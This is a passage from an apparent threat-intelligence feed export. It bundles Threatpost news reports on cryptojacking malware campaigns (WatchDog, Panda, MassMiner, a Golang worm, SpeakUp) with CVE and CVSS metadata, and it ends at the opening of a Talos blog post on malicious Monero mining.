The watchdog daemon\u2019s functionality is to open the device and provide a necessary refresh to keep the system from resetting. 
For example, it can test process table space, memory usage and running processes.\n\n\u201cWatchDog\u2019s usage of Go binaries allows it to perform the stated operations across different operating systems using the same binaries\u2026 as long as the Go Language platform is installed on the target system,\u201d said researchers.\n\nThe Go binaries include a network scanner and exploitation binary (networkmanager), a process monitoring binary (phpguard), and a version of the malicious XMRig cryptomining software (phpupdate).\n\n## **The WatchDog Cryptojacking Campaign: Windows and Linux OS Under Attack**\n\nThe initial attack vector stems from the networkmanager binary. When the binary identifies a vulnerable target, it attempts to compromise that identified system using a robust set of built-in application exploits.\n\nSpecifically, networkmanager comes loaded with 33 exploits, 32 individual remote code execution (RCE) functions and several shell grab functions. For instance, it scans for applications such as Elasticsearch servers that are vulnerable to CVE-2015-1427 and CVE-2014-3120 and Oracle WebLogic Servers vulnerable to CVE-2017-10271.\n\nFor context, this is a significant amount of exploits when compared to other miners \u2013 [such as the Smominru cryptocurrency miner](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>), which operated from 2017 to 2018 and collected nearly 9,000 XMR, said Quist. Unlike Smominru\u2019s two exploits, WatchDog\u2019s numerous exploits and RCE functions \u201cmake it better at compromising exposed systems,\u201d he told Threatpost.\n\n## **WatchDog Compared to Graboid Cryptomining Malware**\n\nOf note, WatchDog is stealthier than other cryptomining malware, such as the wormable [Monero mining malware Graboid](<https://threatpost.com/docker-containers-graboid-crypto-worm/149235/>). 
Discovered last year, Graboid was the largest known mining operation to date in terms of the total number of active systems.\n\nDuring the time of its operation, Graboid consisted of at least 2,000 exposed and compromised Docker Daemon APIs systems, and researchers said the malware could have also achieved \u201chigher processing speeds\u201d due to the configuration script utilizing all available container central processing units (CPUs).\n\nHowever, Graboid was only known to operate for up to three months before its Docker Hub images were removed. That\u2019s because the malware relied on a third-party (Docker Hub) to host its malicious payload \u2013 whereas WatchDog does not, allowing it to have remained active for more than two years, said researchers.\n\nIn fact, WatchDog has a fairly extensive infrastructure behind its mining operations, with researchers mapping out 18 root IP endpoints and seven malicious domains, which serve at least 125 malicious URL addresses used to download its toolset.\n\n## **Cryptojacking: A Cyberattack on the Rise**\n\nWatchDog comes as the value of cryptocurrency has exploded, making cryptojacking a lucrative type of financial attack for cybercriminals. The XMR market value follows the cryptocurrency prices of Bitcoin \u2013 which as of Wednesday set a record-high topping $51,000.\n\nXMR has subsequently increased in value from $153 on February 9 to $254 on Wednesday \u2013 approaching its highest-recorded value of $469.79 (set in January 2018), Quist told Threatpost.\n\n\u201cCybercriminals are watching the market value of XMR,\u201d Quist told Threatpost. \u201cOver the last six months, Unit 42 researchers have seen a 40 percent increase in network traffic to public mining pools, which indicates that more mining operations are taking place. 
The trend of more XMR mining operations appears to be following the increasing market value price of XMR.\u201d\n\nThis week, researchers with Kaspersky also found that distributed denial-of-service (DDoS) attacks dropped significantly at the end of 2020, down 31 percent in the fourth quarter, as cybercriminals switch their efforts to cryptomining. [According to the analysis this week](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>), cybercriminals began repurposing infected devices for cryptomining in response to rising cryptocurrency values.\n\nOne such [recently discovered malware](<https://threatpost.com/new-malware-hijacks-kubernetes-clusters-to-mine-monero/163629/>), dubbed Hildegard, was found being leveraged by the TeamTNT threat group to target Kubernetes clusters with cryptojacking attacks. In January, [researchers also identified an updated malware variant](<https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>) used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks. And, in January, [researchers dug up new discoveries](<https://threatpost.com/sql-server-malware-tied-to-iranian-software-firm-researchers-allege/163230/>) surrounding a cryptomining operation, called MrbMiner, which was downloading a cryptominer on thousands of internet-facing SQL servers.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c**15 Cybersecurity Pitfalls and Fixes for SMBs**__,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. 
_[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "modified": "2021-02-17T21:39:10", "published": "2021-02-17T21:39:10", "id": "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "href": "https://threatpost.com/windows-linux-devices-hijacked-in-two-year-cryptojacking-campaign/164048/", "type": "threatpost", "title": "Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-13T21:58:43", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. 
So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. 
\u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). Panda would then execute the file via PowerShell.\n\nPanda has changed up its payload over the summer as well, so that it\u2019s initial payload now uses the Certutil command-line utility \u2013 which can be used to obtain certificate authority information and configure Certificate Services \u2013 to download the secondary miner payload.\n\nThough the threat actor has swapped up its payloads, targeting and infrastructure, very little of its TTPs [tactics, techniques and procures] are sophisticated, Cisco\u2019s Evans told Threatpost.\n\nFor instance, \u201cThey attempt to hide their miners using the exact same popular techniques we see with other groups,\u201d he told Threatpost. 
\u201cTheir infrastructure is predictable: I can usually peg a new Panda domain as soon as I see it in the data; they tend to just be iterations of each other. Their early infrastructure was registered using an email address that immediately allowed Dave to pivot into their social media in China. They attack the same honeypots day after day with the same payloads. They don\u2019t even bother to confirm their victims are running a vulnerable system before they deliver an exploit.\u201d\n\nBetween swapping up its tactics, domains and payloads, researchers said that Panda has now made more than $100,000 through illicit cryptomining \u2013 and moving forward, Panda remains an active threat that system administrators should be wary of.\n\n\u201cThere are several ways to detect mining activity but let\u2019s focus on the simple solutions of patching and basic security controls,\u201d Evans told Threatpost. \u201cIf you\u2019re running a web-accessible WebLogic server that hasn\u2019t been patched against vulnerabilities like CVE-2017-10271, it\u2019s likely they have at least targeted the system for exploitation if not actually dropped a miner on it\u2026 In addition, if you don\u2019t need it open to the Internet, take it off.\u201d\n\n_**Interested in the role of artificial intelligence in cybersecurity, for both offense and defense? Don\u2019t miss our free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)_**, AI and Cybersecurity: Tools, Strategy and Advice, with senior editor Tara Seals and a panel of experts. 
**__**[Click here to register.](<https://register.gotowebinar.com/register/8988544242398214146?source=ART>)**_\n", "modified": "2019-09-17T21:04:35", "published": "2019-09-17T21:04:35", "id": "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "href": "https://threatpost.com/panda-threat-group-mines-for-monero-with-updated-payload-targets/148419/", "type": "threatpost", "title": "Panda Threat Group Mines for Monero With Updated Payload, Targets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:49:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-0143", "CVE-2017-10271", "CVE-2017-5638"], "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). 
It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. 
\u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that MassMiner may have loftier goals than simply cryptomining. On the EternalBlue front, it uses the exploit to drop the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) Windows kernel attack, which is a sophisticated memory-based payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish, giving them full control over the system.\n\nMassMiner also uses EternalBlue to install [Gh0st RAT](<https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/>), a trojan backdoor for persistence that has targeted the Windows platform for years. It was once primarily a nation-state tool used in APT espionage attacks against government agencies, activists and other political targets, until the EternalBlue exploit was used to spread it in other contexts last year.\n\nIncidentally, this is not the only cryptomining malware to make use of the ShadowBrokers\u2019 [release](<https://threatpost.com/shadowbrokers-remain-an-enigma/127072/>) of a trove of NSA exploits. Last week, [a malware called PyRoMine](<https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>) that uses the EternalRomance tool was found in the wild mining Monero. 
Like MassMiner, it has far-ranging and concerning capabilities: It sets up a hidden default account on the victimized machine with system administrator privileges, which can be used for re-infection and further attacks.\n\nThe multi-pronged approach may be unusual, but it showcases the increasingly complex task that businesses have in front of them when it comes to their security postures.\n\n\u201cThe enterprise attack surface is hyper-dimensional and constantly increasing with hundreds of attack vectors. Enterprises continue to struggle with not just mapping their attack surfaces, but also identifying which systems are easiest to attack and can be used as a launch point for a breach,\u201d said Mishra.\n", "modified": "2018-05-03T20:26:37", "published": "2018-05-03T20:26:37", "id": "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "href": "https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/", "type": "threatpost", "title": "MassMiner Takes a Kitchen-Sink Approach to Cryptomining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:23:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. 
Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. 
\u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader payload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. 
It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding an authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Threatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. 
[Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-06-25T18:30:59", "published": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "bulletinFamily": "info", "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2016-3088", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-2894"], "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. 
And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. 
If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying 
the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp had no detections in VirusTotal at the time of the analysis.\n\nThe initial victims have been in Eastern Asia and Latin America, but researchers believe that the U.S. could be the next target, if not the rest of the world. 
Given the impressive propagation tactics, a non-existent detection rate on VirusTotal, and the fact that the threat surface contains servers that run the top sites on the internet, SpeakUp could end up being a very big deal, researchers said: \u201cThis campaign, while still relatively new, can evolve into something bigger and potentially more harmful\u2026[and] at the time of writing this article, it has no detections in VirusTotal.\u201d\n\n## Attribution\n\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, it\u2019s clear that it\u2019s someone or a group with plenty of malware-authoring chops.\n\n\u201cWhile currently we\u2019ve spotted a cryptocurrency mining payload, the most notable aspect is the spreading abilities demonstrated in the code,\u201d Vanunu told Threatpost. \u201cNot only this was highly obfuscated, the variety of exploits used could potentially mean we have a highly skilled threat actor behind it.\u201d\n\nCheck Point researchers were able to correlate SpeakUp\u2019s author with a possibly Russian-speaking malware developer under the name of Zettabit.\n\n\u201cAlthough SpeakUp is implemented differently [than Zettabit\u2019s other code], it has a lot in common with Zettabit\u2019s craftmanship,\u201d according to the analysis.\n\nIn terms of what links Zettabit to this malware, \u201cwe\u2019ve read all of his Hack Forums posts and Github projects, so this avatar definitely knows his way around botnets,\u201d Vanunu told Threatpost. \u201cHe even released a free example of botnet code for anyone to use. And while researching, we\u2019ve identified two unique strings that were mentioned and used by Zettabit himself a couple of time in the past.\u201d\n\n_This story was updated at 2:23 p.m. ET on February 4 to reflect additional details from the researchers. 
_\n", "modified": "2019-02-04T14:00:15", "published": "2019-02-04T14:00:15", "id": "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "href": "https://threatpost.com/speakup-linux-backdoor/141431/", "type": "threatpost", "title": "SpeakUp Linux Backdoor Sets Up for Major Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2018-01-31T17:59:53", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-3506"], "description": "## The Dark Side of the Digital Gold Rush\n\n \n_This post was authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n[](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)\n\n_ \n_ \n\n\n## Executive Summary\n\n \nThe threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks. \n \nThis focus on mining isn't entirely surprising, considering that various cryptocurrencies along with \"blockchain\" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. 
Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims. \n \nIn this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward. \n \nTo put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing. \n \nThis is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. 
While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially: \n\n\n * The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.\n * These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.\n * Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers \u2013 sitting on this currency until it hits such a point where the attacker decides to cash in. \n\n## \n\n## Introduction\n\n \nThroughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns. \n \nOver the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. 
